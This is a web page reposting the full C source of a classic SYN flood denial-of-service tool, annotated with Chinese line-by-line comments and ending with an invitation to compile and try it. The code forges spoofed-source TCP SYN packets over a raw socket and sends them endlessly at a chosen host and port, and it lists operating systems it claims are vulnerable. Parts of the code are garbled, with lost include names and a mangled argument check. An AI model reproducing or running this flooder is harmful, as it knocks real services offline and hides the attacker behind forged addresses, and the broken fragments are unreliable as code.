Heim > php教程 > php手册 > 一个SYN攻击的代码分析--Used Gcc/RedHat Linux 9.0编译

一个SYN攻击的代码分析--Used Gcc/RedHat Linux 9.0编译

WBOY
Freigeben: 2016-06-13 10:26:56
Original
1262 Leute haben es durchsucht

这是一个LINUX/UNIX的时代,你还在为自己懂一点点的 Java development..这是一个SYN攻击的源程序: 大家试着读一读,看是否能读懂,不懂可以给我留言E-MAIL:QIYU155·126。COM。 我加的有中文注释!
这是一个SYN攻击的源程序: 大家试着读一读,看是否能读懂,不懂可以给我留言。 我加的有中文注释。 /* Syn Attack against a port for Solaris */ /* Original land attack, land.c by m3lt, FLC */ /* Ported to 44BSD by blast and jerm */ /* Ported to Solaris by ziro antagonist */ /* Referenced flood.c by unknown author */ /* Converted into a syn attack against one port by CRG */ /* Please use this for educational purposes only */ /* Compiles on Solaris gcc -o synsol synsol.c -lsocket -lnsl */ /* Additional notes: */ /* Successfully compiled on Solaris 2.51 and 2.6 */ /* Runs: synsol    */ /* */ /* Tested it on: Solaris 2.6 */ /* */ /* Attacked against: */ /* Linux 2.0.33 - vulnerable */ /* Linux 2.0.30 - vulnerable */ /* Linux 1.2.13 - vulnerable */ /* Solaris 2.4 - vulnerable */ /* Solaris 2.5.1 - vulnerable */ /* SunOS 4.1.3_U3 - vulnerable */ /* Solaris 2.6 - not vulnerable */ /* */ /* Most of these test machines are not patched because they */ /* are in test lab. I tested the program against port 23 and */ /* every once in awhile I did get through. */ /* */ /* Direct any comments, questions, improvements to */ /* packetstorm@genocide2600.com */ /* http://www.genocide2600.com/~tattooman/ */ /* Your emails will be forwarded to the author, who wishes */ /* to remain known only as CRG (no email addy or URL) */ /*jjgirl:上面的注释的不用说了!*/ #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  /*jjgirl:上面是头文件!*/   unsigned long srcport;   struct pseudohdr { struct in_addr saddr; struct in_addr daddr; u_char zero; u_char protocol; u_short length; struct tcphdr tcpheader; }; /*jjgirl:定义一个伪装地址的结构!*/   u_short checksum(u_short * data,u_short length) { int nleft = length; int sum=0; unsigned short *w = data; unsigned short value = 0;   while (nleft > 1) { sum += *w++; nleft -= 2; }   if (nleft == 1) { *(unsigned char *) (&value) = *(unsigned char *) w; sum += value; } sum = (sum >>16) + (sum & 0xffff); sum += (sum >> 16); value = ~sum; return(value); } /*jjgirl:上面校验文件!包头是需要校验的,CRC校验!*/     int main(int argc,char * * argv) {/*jjgirl:主程序开始了!*/ struct sockaddr_in sin; struct sockaddr_in din; struct hostent * hoste; struct hostent * host1; int j,sock,foo, flooddot=1; char buffer[40]; struct ip * ipheader=(struct ip *) buffer; struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip)); struct pseudohdr pseudoheader; /*jjgirl:上面定义变量!*/   fprintf(stderr,"Syn attack against one port.(Infinite) ");   if(argch_addr,&din.sin_addr,host1->h_length); else if((din.sin_addr.s_addr=inet_addr(argv[3]))==-1) { fprintf(stderr,"unknown source host %s ",argv[3]); return(-1); } if((hoste=gethostbyname(argv[1]))!=NULL) bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) { fprintf(stderr,"unknown destination host %s ",argv[1]); return(-1); }   if((sin.sin_port=htons(atoi(argv[2])))==0) { fprintf(stderr,"unknown port %s ",argv[2]); return(-1); } /*jjgirl:上面是给sockaddr_in结构赋值,需要指明协议,端口号!*/       if((sock=socket(AF_INET,SOCK_RAW,255))==-1) { fprintf(stderr,"couldnt allocate raw socket "); return(-1); } /*jjgirl:上面开始Socket了!*/   foo=1; if(setsockopt(sock,0,IP_HDRINCL,(char *)&foo,sizeof(int))==-1) { fprintf(stderr,"couldnt set raw header on socket "); return(-1); } /*jjgirl:上面是为了重构报头!*/   for(j=1;j>0;j++) { bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr)); ipheader->ip_v=4; ipheader->ip_tos=0; ipheader->ip_hl=sizeof(struct ip)/4; ipheader->ip_len=sizeof(struct ip)+sizeof(struct tcphdr); ipheader->ip_id=htons(random()); ipheader->ip_ttl=30; /*255;*/ ipheader->ip_p=IPPROTO_TCP; ipheader->ip_sum=0; ipheader->ip_src=din.sin_addr; ipheader->ip_dst=sin.sin_addr;   tcpheader->th_sport=htons(srcport); /*sin.sin_port;*/ tcpheader->th_dport=sin.sin_port; tcpheader->th_seq=htonl(0x28374839); tcpheader->th_flags=TH_SYN; tcpheader->th_off=sizeof(struct tcphdr)/4; tcpheader->th_win=htons(2048); tcpheader->th_sum=0;   bzero(&pseudoheader,12+sizeof(struct tcphdr)); pseudoheader.saddr.s_addr=din.sin_addr.s_addr; pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; pseudoheader.protocol=6; pseudoheader.length=htons(sizeof(struct tcphdr)); bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); /*jjgirl:上面是重构报头!*/   srcport= (10000.0*random()/(15000+1.0)); /*jjgirl:端口当然要变!*/   if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1) /*jjgirl:攻击开始!*/ { fprintf(stderr,"couldnt send packet,%d ",errno); return(-1); } usleep(2); if (!(flooddot = (flooddot+1)%(1)))   /*jjgirl:显示次数! Jjgirl 把上面一句,改为如下两句,增加显示效果,随你的便! int k=j; if((k%10)==0) printf(" "); */   } /*The end of the infinite loop*/ close(sock); return(0); } /*jjgirl:结束!编译试试吧!如果有看不懂可以给我留言,或E-MAIL:qiyu155@126.com!*/

Verwandte Etiketten:
Quelle:php.cn
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Empfehlungen
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage